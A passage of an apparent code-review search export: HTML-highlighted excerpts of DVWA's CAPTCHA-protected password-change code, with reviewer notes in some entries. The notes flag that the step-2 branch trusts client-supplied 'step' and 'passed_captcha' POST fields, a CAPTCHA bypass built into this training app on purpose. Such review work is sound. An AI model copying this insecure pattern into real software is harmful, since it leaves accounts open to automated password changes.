class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span 
class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly",
  "line": 14,
  "start": 9,
  "end": 20,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 119,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token 
operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$html</span>     <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>&lt;br />The CAPTCHA was incorrect. Please try again.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 15,
  "start": 10,
  "end": 21,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 120,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">40:</span> \t\t\t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">41:</span> \t\t}\n<span class=\"line-number\">42:</span> \t}\n<span class=\"line-number\">43:</span> }\n<span class=\"line-number\">44:</span> \n<span class=\"highlight\"><span class=\"line-number\">45:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'2'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">46:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">47:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">50:</span> \t<span class=\"token variable\">$pass_new</span>  <span 
class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 45,
  "start": 40,
  "end": 51,
  "severity": "unknown",
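  "note": "Line 45: this branch is selected by the client-supplied 'step' POST field. Nothing in the lines shown ties step 2 to a CAPTCHA that was passed in step 1. Confirm that the handler re-validates the CAPTCHA, or checks server-side state such as a session flag, before it acts on password_new."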
 },
 {
  "id": 121,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">45:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'2'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">46:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">47:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">50:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">51:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span 
class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">52:</span> \n<span class=\"line-number\">53:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check <span class=\"token keyword\">to</span> see <span class=\"token keyword\">if</span> both password match\n<span class=\"line-number\">54:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">55:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!",
  "line": 50,
  "start": 45,
  "end": 56,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 122,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">46:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">47:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">50:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">51:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">52:</span> \n<span class=\"line-number\">53:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check <span class=\"token keyword\">to</span> see <span class=\"token keyword\">if</span> both password match\n<span class=\"line-number\">54:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">55:</span> \t\t<span class=\"token operator\">/</span><span 
class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">56:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 51,
  "start": 46,
  "end": 57,
  "severity": "unknown",
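  "note": "Lines 50-56 take the new password from POST, compare it with the confirmation value and escape it for the database; no check that the CAPTCHA was solved appears in this excerpt. Confirm against the rest of the branch: a password change that relies only on the client reaching this step is not protected by the CAPTCHA."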
 },
 {
  "id": 127,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'1'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" 
spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 128,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'1'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span 
class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
  "line": 8,
  "start": 3,
  "end": 14,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 129,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span 
class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 130,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span 
class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly",
  "line": 14,
  "start": 9,
  "end": 20,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 131,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token 
operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$html</span>     <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>&lt;br />The CAPTCHA was incorrect. Please try again.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 15,
  "start": 10,
  "end": 21,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 132,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">41:</span> \t\t\t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">42:</span> \t\t}\n<span class=\"line-number\">43:</span> \t}\n<span class=\"line-number\">44:</span> }\n<span class=\"line-number\">45:</span> \n<span class=\"highlight\"><span class=\"line-number\">46:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'2'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">47:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">48:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">49:</span> \n<span class=\"line-number\">50:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">51:</span> \t<span class=\"token variable\">$pass_new</span>  <span 
class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 46,
  "start": 41,
  "end": 52,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 133,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">46:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'2'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">47:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">48:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">49:</span> \n<span class=\"line-number\">50:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">51:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">52:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span 
class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">53:</span> \n<span class=\"line-number\">54:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check <span class=\"token keyword\">to</span> see <span class=\"token keyword\">if</span> they did stage <span class=\"token number\">1</span>\n<span class=\"line-number\">55:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'passed_captcha'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">56:</span> \t\t<span class=\"token variable\">$html</span>     <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>&lt;br />You have not passed the CAPTCHA.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 51,
  "start": 46,
  "end": 57,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 134,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">47:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">48:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">49:</span> \n<span class=\"line-number\">50:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">51:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">52:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">53:</span> 